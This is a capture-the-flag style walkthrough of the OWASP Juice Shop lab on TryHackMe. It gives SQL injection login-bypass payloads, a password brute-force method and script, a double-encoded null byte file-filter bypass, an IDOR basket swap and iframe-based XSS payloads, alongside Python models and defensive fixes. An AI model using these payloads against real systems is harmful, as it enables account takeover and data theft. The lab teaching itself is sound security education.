TryHackMe: OWASP Juice Shop

goay xuan hui
6 min read · Mar 3, 2021

SQL Injection

Question #1: Log into the administrator account!

email: ' or 1=1-- || password: a

To perform a SQL injection attack, we must first understand the SQL query the login form runs. A normal login looks like this:

SELECT * FROM users WHERE email = 'admin' AND password = '12345';

This is what the query looks like when we input {email: ' or 1=1--}{password: a}:

SELECT * FROM users WHERE email = '' or 1=1--' AND password = 'a';

Since 1=1 is always true and -- tells the database that everything after it is a comment, the password check is commented out and the WHERE clause matches every row in the table.

The application takes the first row returned as the logged-in user, which is the lowest user id and happens to be the administrator account.

Question #2: Log into the Bender account!

email: bender@juice-sh.op'-- || password: a

SELECT * FROM users WHERE email = 'bender@juice-sh.op'--' AND password = 'a';

Here the injected quote closes the email string with a valid value and the comment removes the password check, so only Bender's row is returned and we are logged in as Bender.
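As an added illustration that is not part of the original write-up, the following Python stand-in builds the same login query against an in-memory SQLite table. The table layout, the sample users and their passwords are constructed for the example (Juice Shop's real schema differs); it runs both payloads from above through the vulnerable string-built query and through a parameterised one.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the users table (sample data, not Juice Shop's schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (id, email, password) VALUES (?, ?, ?)",
        [
            (1, "admin@juice-sh.op", "admin123"),
            (2, "jim@juice-sh.op", "jim-pw"),
            (3, "bender@juice-sh.op", "bender-pw"),
        ],
    )
    return db


def login_vulnerable(db, email, password):
    """Builds the query by string concatenation, exactly the pattern the write-up exploits.
    Like the application, it logs in whoever comes back first."""
    query = f"SELECT id, email FROM users WHERE email = '{email}' AND password = '{password}'"
    rows = db.execute(query).fetchall()
    return rows[0] if rows else None


def login_safe(db, email, password):
    """Parameterised query: the payload is compared as data and never parsed as SQL."""
    return db.execute(
        "SELECT id, email FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 1=1--", "a"))            # (1, 'admin@juice-sh.op')
    print(login_vulnerable(db, "bender@juice-sh.op'--", "a"))  # (3, 'bender@juice-sh.op')
    print(login_safe(db, "' or 1=1--", "a"))                   # None
```

One caveat when transferring this to the real target: Juice Shop hashes the password before concatenating it into the query, so the injection has to go through the email field; the sample stores plaintext passwords only to keep the example short.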

References: https://portswigger.net/web-security/sql-injection

Password Attack

Question #1: Bruteforce the Administrator account’s password!

This can be done easily with Burp Suite:

  1. Use Burp to intercept a login request.
  2. Send the request to Intruder.
  3. Mark the password field as the payload position.
  4. Load the payload list from /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt
  5. Start the attack and sort the results by status code: failed attempts return 401, the correct password returns 200 with a token in the response.
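The same attack scripted in Python, as an added example rather than part of the original write-up. The loop is separated from the HTTP call so it can be run offline against a constructed credential store; the endpoint /rest/user/login, its JSON body and the 200/401 responses are assumptions about Juice Shop's login API, and the target URL is a placeholder.

```python
import json
import urllib.error
import urllib.request


def http_login(base_url, email, password, timeout=5):
    """One login attempt against the JSON login API.
    Assumption: POST {base_url}/rest/user/login answers 200 (with a token) on success, 401 on failure."""
    req = urllib.request.Request(
        f"{base_url}/rest/user/login",
        data=json.dumps({"email": email, "password": password}).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False
        raise  # 429 (rate limiting) or 5xx means stop and look, not skip silently


def brute_force(attempt, email, wordlist):
    """Try each candidate once, in wordlist order; return the first password that works, else None.
    `attempt(email, password) -> bool` is pluggable so the loop can be tested without a network."""
    tried = set()
    for line in wordlist:
        password = line.rstrip("\r\n")
        if not password or password in tried:
            continue
        tried.add(password)
        if attempt(email, password):
            return password
    return None


if __name__ == "__main__":
    # Offline demonstration: a constructed credential store stands in for the server.
    fake_users = {"admin@juice-sh.op": "admin123"}
    demo_wordlist = ["123456\n", "password\n", "admin123\n", "letmein\n"]
    print(brute_force(lambda e, p: fake_users.get(e) == p, "admin@juice-sh.op", demo_wordlist))
    # Against a live instance (replace TARGET), point the loop at the real endpoint:
    # with open("/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt") as f:
    #     print(brute_force(lambda e, p: http_login("http://TARGET", e, p), "admin@juice-sh.op", f))
```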

Sensitive Data Exposure

Question #1: Access the Confidential Document!

Before getting into the actual hacking, it is good to look around first.

  1. Turn on your browser proxy.
  2. Set Proxy Intercept in Burp Suite to off, so requests are recorded but not held.
  3. Browse around the website to build a site map.
  4. Go to the Target → Site map tab in Burp Suite and you will see an /ftp directory there.
  5. Access http://10.10.111.215/ftp/ and download the acquisitions.md file.

Question #2: Find the ScoreBoard!

From the site map that you built in Question #1, you should be able to see the score-board route (shown in a screenshot in the original post).

%20 in URL encoding stands for a space; the actual route uses a hyphen, so to access the scoreboard just paste this into the address bar: http://10.10.111.215/#/score-board.

Poison Null Byte

Question #3: Download the Backup file!

In computing, “.bak” is a filename extension commonly used to signify a backup copy of a file.

OWASP Juice Shop (Express ^4.17.1)
403 Error: Only .md and .pdf files are allowed!

In this case, requesting the .bak file from the FTP directory returns the 403 error above: only .md and .pdf files are allowed.

To bypass this check, we can use the Poison Null Byte technique: append %00 followed by an allowed extension. The server decodes the URL once before the extension check runs, so the %00 has to be URL-encoded a second time, which gives %2500. After that single decode the name is package.json.bak%00.md, which ends in .md and passes the check; the file-serving layer then turns %00 into a real null byte, which terminates the path, so package.json.bak is served.

http://10.10.86.49/ftp/package.json.bak%2500.md

For example, consider this Java code:

String filename = request.getParameter("filename");

if (filename.endsWith(".jpg"))
{
    File f = new File(filename);
    // ... read f and return its contents to the user
}

This code checks the user-supplied file extension to make sure that it is a JPEG file. If so, the argument is passed to the constructor of java.io.File to open the specified file.

However, this can be exploited by passing secret.txt%00.jpg (which decodes to secret.txt, a null byte, and .jpg) to the function. The exploitation works because of the difference in how null bytes are handled in managed code and in native code: a Java string can contain a null byte, but in the native code behind java.io.File a null byte terminates the string.

In this case, when the input is passed to the function:

  1. It checks the last four characters → secret.txt<NUL>.jpg ends with .jpg → Match!
  2. The argument goes to java.io.File, where the null byte terminates the string → secret.txt is opened instead.

Note that current JDKs reject a path containing a null byte (java.io.File checks for it), so this exact example no longer works on an up-to-date runtime; the pattern to look for is a check in managed code followed by a native consumer that stops at the first null byte.

References: https://portswigger.net/blog/null-byte-attacks-are-alive-and-well
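The following Python model is an added example, not code from the write-up or from Juice Shop. It reproduces the two decoding layers described above (framework decode and extension check, then file-layer decode and a native consumer that stops at the first NUL) and shows which file the double-encoded name actually reaches. The allow-list and the two-layer structure are assumptions that follow the text; libc's strlen is used to show the native behaviour where it can be loaded.

```python
import ctypes
import urllib.parse

ALLOWED_EXTENSIONS = (".md", ".pdf")


def decode_once(path):
    """One percent-decoding pass, as the web framework does on the request path."""
    return urllib.parse.unquote(path)


def extension_allowed(name):
    """The allow-list check from the write-up, applied to the once-decoded name."""
    return name.endswith(ALLOWED_EXTENSIONS)


def as_c_string(name):
    """What a native (C) consumer sees: the bytes before the first NUL.
    libc's strlen is used when it can be loaded; the fallback applies the same rule in Python."""
    raw = name.encode()
    try:
        libc = ctypes.CDLL(None)
        libc.strlen.restype = ctypes.c_size_t
        libc.strlen.argtypes = [ctypes.c_char_p]
        length = libc.strlen(raw)  # stops at the first NUL, whatever length Python reports
    except (OSError, AttributeError, TypeError):
        length = raw.find(b"\x00")
        if length < 0:
            length = len(raw)
    return raw[:length].decode()


def served_file(request_path):
    """Model of the two layers: the framework decodes once and checks the extension; the file
    layer decodes again and hands the name to native code, which stops at the null byte.
    Returns the file actually opened, or None for the 403 rejection."""
    name = decode_once(request_path)
    if not extension_allowed(name):
        return None  # 403 Error: Only .md and .pdf files are allowed!
    return as_c_string(decode_once(name))


if __name__ == "__main__":
    for p in ("package.json.bak", "package.json.bak%2500.md"):
        print(p, "->", served_file(p))
```

A single-encoded %00 is turned into a real null byte by the first decode, and current Node.js file-serving code rejects such a path outright; the double-encoded form survives the first decode as the literal text %00, which is what lets the name pass the extension check and still be cut short later.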

Access Control Vulnerabilities and Privilege Escalation

Question #1: Access the administration page!

http://10.10.86.130/#/administration

There are a few ways to find a hidden admin page:

  1. Browse to the admin page through predictable URLs like:

https://insecure-website.com/admin

https://insecure-website.com/robots.txt

  2. For less predictable URLs, look through the browser's Web Developer tools at the index page or JS files, as the URL is often disclosed in the JavaScript that builds the user interface based on the user's role.

In this case, we can find the admin page by opening the Debugger in Firefox → refreshing the page → opening the index page or main .js file → searching for the term "admin" → looking for the path: entry that names the admin route.
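The manual search above can be automated. The Python below is an added example, not part of the write-up: it pulls every path: entry out of a JavaScript bundle and turns the interesting ones into URLs. The bundle text is a constructed fragment in the shape of an Angular route table (not Juice Shop's real main.js), and the keyword list is a choice made for the example.

```python
import re

# Constructed fragment in the shape of an Angular router bundle (sample, not Juice Shop's main.js).
SAMPLE_BUNDLE = """
const routes=[{path:"administration",component:AdministrationComponent,canActivate:[AdminGuard]},
{path:"accounting",component:AccountingComponent},{path:"about",component:AboutComponent},
{path:"score-board",component:ScoreBoardComponent},{path:'track-result',component:TrackResultComponent},
{path:"",redirectTo:"search",pathMatch:"full"},{path:"**",redirectTo:"search"}];
"""

# path: followed by a single- or double-quoted string; the backreference keeps the quote style paired.
ROUTE_RE = re.compile(r"""path\s*:\s*(['"])([^'"]*)\1""")


def extract_routes(bundle_js):
    """Distinct client-side route paths declared in a JS bundle, in order of appearance.
    Empty and wildcard entries are router plumbing, not pages, so they are dropped."""
    found = []
    for match in ROUTE_RE.finditer(bundle_js):
        path = match.group(2)
        if path and path != "**" and path not in found:
            found.append(path)
    return found


def interesting_routes(routes, keywords=("admin", "account", "score", "debug", "config")):
    """Routes a tester would request first; the keyword list is a judgement call for the example."""
    return [r for r in routes if any(k in r.lower() for k in keywords)]


def to_urls(base, routes):
    """Juice Shop is a single-page app that uses hash routing, hence the '/#/' prefix."""
    return [f"{base}/#/{r}" for r in routes]


if __name__ == "__main__":
    routes = extract_routes(SAMPLE_BUNDLE)
    for url in to_urls("http://10.10.86.130", interesting_routes(routes)):
        print(url)
```

An Angular canActivate guard like the one in the sample runs in the browser: it hides navigation but cannot protect the route or the REST API behind it, so every path found this way is worth requesting directly. Against a live target, fetch the main bundle with urllib and pass its text to extract_routes.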

References: https://portswigger.net/web-security/access-control

Question #2: View another user’s shopping basket!

This can be done by browsing to the 'Your Basket' page with your own account while Burp intercepts the requests.

Keep forwarding requests until you see: GET /rest/basket/1 HTTP/1.1.

Then simply change the identifier to another basket: GET /rest/basket/2 HTTP/1.1.

The basket id comes from the URL rather than from the session, and the server never checks that the requested basket belongs to the authenticated user, which is an insecure direct object reference (IDOR).

XSS Attacks

Question #1: Perform a DOM XSS!

The easiest way to test whether a page is vulnerable to DOM XSS is to inject an <iframe>. <iframe> is a common HTML element, and if user input is inserted into the DOM as HTML rather than as text, an injected <iframe> (or any other element) will be rendered, which is a strong sign of XSS.

In this case, we can inject <iframe src="javascript:alert(`xss`)"> into the search bar and see if it triggers an alert.

DOM XSS happens when client-side JavaScript takes attacker-controllable data from a source and passes it to a sink that renders or executes it without checking.

  • Source: a location from which user-controlled input enters the script. For example, location.search.
  • Sink: a DOM API through which that input gets rendered or executed. For example, document.write.

The best-known sources and sinks are listed below:

Sources

  • document.URL
  • document.referrer
  • location
  • location.href
  • location.search
  • location.hash
  • location.pathname

Sinks

  • eval
  • setTimeout
  • setInterval
  • document.write
  • element.innerHTML

Question #2: Perform a persistent XSS!

Persistent XSS is also known as stored XSS. It is exploited by injecting a malicious script into data the server stores, so that each time the affected page is viewed, the script is delivered to the victim's browser.

In this case, OWASP Juice Shop has a "Last Login IP" page that keeps track of the user's last login IP. With this, we can try a persistent XSS by injecting the script through the True-Client-IP header, so that when the user opens the "Last Login IP" page, the script executes.

The True-Client-IP header is similar to the X-Forwarded-For header: both are used to identify the originating IP address of a client who connects through a proxy or load balancer, because otherwise the server would only see the IP address of the proxy or load balancer. Juice Shop trusts whatever value the client puts in this header and renders it as HTML, which is what makes the injection work.

  1. Log in to the admin account.
  2. Turn on the browser's proxy and interception in Burp.
  3. Log out of the admin account → go to Burp → find the logout request.
  4. Send the request to Repeater → add the header below → click Send.

True-Client-IP: <iframe src="javascript:alert(`xss`)">

  5. Go back to the browser → turn the browser's proxy off → log in again and open the "Last Login IP" page → the 'xss' alert pops up.
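To show what the server gets wrong and how it should be fixed, here is an added Python example that is not code from the write-up or from Juice Shop. It parses a constructed logout request carrying the header from step 4 (the request path and cookie are placeholders), extracts the client IP the vulnerable way and the hardened way, and renders the "Last Login IP" fragment with and without output encoding. The header-trust rule and the HTML fragment are assumptions for the example.

```python
import html
import ipaddress

PAYLOAD = '<iframe src="javascript:alert(`xss`)">'

# Constructed logout request carrying the write-up's header (path and cookie are placeholders).
SAMPLE_REQUEST = (
    "GET /logout HTTP/1.1\r\n"
    "Host: juice-shop.local\r\n"
    "Cookie: token=<jwt>\r\n"
    f"True-Client-IP: {PAYLOAD}\r\n"
    "\r\n"
)


def parse_headers(raw_request):
    """Header lines of a raw HTTP/1.1 request as a dict with lower-cased names."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def client_ip_unsafe(headers, peer_ip):
    """The vulnerable pattern: take True-Client-IP as-is, falling back to the socket address."""
    return headers.get("true-client-ip", peer_ip)


def client_ip_safe(headers, peer_ip, behind_trusted_proxy=False):
    """Hardened: honour the header only when the request came through our own proxy,
    and only if its value parses as an IP address; otherwise use the socket address."""
    if behind_trusted_proxy and "true-client-ip" in headers:
        try:
            return str(ipaddress.ip_address(headers["true-client-ip"]))
        except ValueError:
            pass  # not an IP address: discard it rather than store it
    return peer_ip


def render_last_login(ip, escape=True):
    """The 'Last Login IP' fragment. HTML-escaping on output is the second, independent fix:
    even an already-stored payload is then shown as text instead of parsed as markup."""
    shown = html.escape(ip, quote=True) if escape else ip
    return f'<div class="last-login-ip">{shown}</div>'


if __name__ == "__main__":
    headers = parse_headers(SAMPLE_REQUEST)
    peer = "10.10.14.3"
    print(render_last_login(client_ip_unsafe(headers, peer), escape=False))  # iframe survives
    print(render_last_login(client_ip_unsafe(headers, peer)))                # escaped to text
    print(render_last_login(client_ip_safe(headers, peer)))                  # socket address stored
```

Validation on input (client_ip_safe) stops the payload from ever being stored; encoding on output (render_last_login) stops it from executing if it is. A fix needs both, since the stored value is shown to the victim long after the request that planted it.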

Question #3: Perform a reflected XSS!

Unlike a stored XSS attack, reflected XSS needs the victim to open a crafted link. One way to deliver it is to distribute the malicious link through a phishing email or the comment section of a website.

This exploitation is performed by looking at URL parameters. In this case, if we browse to the 'Order History' page and click on the 'Truck' icon, it brings us to the track-result page, which has an "id" parameter in the URL.

http://10.10.62.102/#/track-result?id=5267-d4643c9c9c9280cf

From there, we can test whether the "id" value is reflected into the page without being encoded by replacing it with <iframe src="javascript:alert(`xss`)">: if the alert fires, the parameter is written into the DOM as HTML.
